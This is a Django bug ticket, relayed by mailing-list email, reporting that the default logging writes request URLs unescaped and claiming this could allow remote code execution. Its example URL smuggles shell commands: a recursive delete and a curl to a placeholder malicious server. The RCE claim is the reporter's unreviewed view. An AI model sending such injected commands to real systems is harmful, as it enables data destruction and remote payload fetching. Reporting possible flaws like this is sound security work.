#33610: Django does not escape the request url in default logging mechanism and
may
be vulnerable to remote code execution
-----------------------------------------+------------------------
Reporter: Dhananjay1992 | Owner: nobody
Type: Bug | Status: new
Component: Utilities | Version: 4.0
Severity: Normal | Keywords:
Triage Stage: Unreviewed | Has patch: 0
Needs documentation: 0 | Needs tests: 0
Patch needs improvement: 0 | Easy pickings: 0
UI/UX: 0 |
-----------------------------------------+------------------------
**Issue**:
When logging enabled in Django the log_response method in log.py of
django.utils package logs the given url in the log file as it is without
escaping the url which may lead to remote code execution.
**For example:**
An attacker hits the Django project with this url: <hostname>/cgi-bin;cd
/var/temp;rm -rf <any folder>; curl <malicious remote server url>
In this case we can see the log file entry with warning (yes because of
404 not found error level is warning) with given url as it is. IMHO we
should escape the request response logging so as to minimise the remote
code execution possibilities
--
Ticket URL: <https://code.djangoproject.com/ticket/33610>
Django <https://code.djangoproject.com/>
The Web framework for perfectionists with deadlines.
--
You received this message because you are subscribed to the Google Groups
"Django updates" group.
To unsubscribe from this group and stop receiving emails from it, send an email
to [email protected].
To view this discussion on the web visit
https://groups.google.com/d/msgid/django-updates/0107017fde4b69b9-0519e889-f858-472e-80cc-a1e277eedf54-000000%40eu-central-1.amazonses.com.
